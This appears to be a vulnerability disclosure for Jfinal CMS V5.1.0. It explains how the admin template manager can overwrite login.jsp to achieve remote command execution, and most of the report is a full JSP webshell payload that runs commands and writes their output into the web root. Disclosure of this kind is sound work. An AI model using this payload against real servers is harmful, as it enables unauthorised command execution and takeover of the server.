Jfinal_ CMS V5.1.0 has login.jsp written to RCE

[ZccAcc]

There is a filter that by default denies direct access to JSP files. The login.jsp in web.xml's means that accessing the homepage module can directly invoke login.jsp. The backend template management module can manage files under the web directory. It can modify the content of login.jsp through an interface call, inserting malicious code into the content of login.jsp. Inject malicious code into login.jsp to execute commands and write the command execution result into mkodp_1.txt. Accessing http://ip:port/jfinal_cms/admin/ will trigger the code inside login.jsp, leading to command execution and writing to mkodp_1.txt. Repeat the above process to execute the "ip a" command.

The modified content of login.jsp is as follows: `<%@ page language="java" pageEncoding="UTF-8"%> <% // 生成一个随机的文件名 String randomFileName = "mkodp_1.txt";

// 获取当前 JSP 文件所在的真实路径
String currentPath = application.getRealPath("/");

// 构建文件的绝对路径
String filePath = currentPath + randomFileName;

try {
    String command = "whoami"; // 修改为你想要执行的命令
    java.util.Scanner scanner = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
    String result = scanner.hasNext() ? scanner.next() : "";
    scanner.close();

    // 将命令回显存储在变量中
    String commandOutput = result;
    // 创建文件并写入内容
    java.io.FileWriter fileWriter = new java.io.FileWriter(filePath);
    fileWriter.write(commandOutput);
    fileWriter.close();

    out.println("文件已生成：" + filePath);
} catch (Exception e) {
    out.println("出现错误：" + e.getMessage());
}

%> <% response.sendRedirect("login"); %> `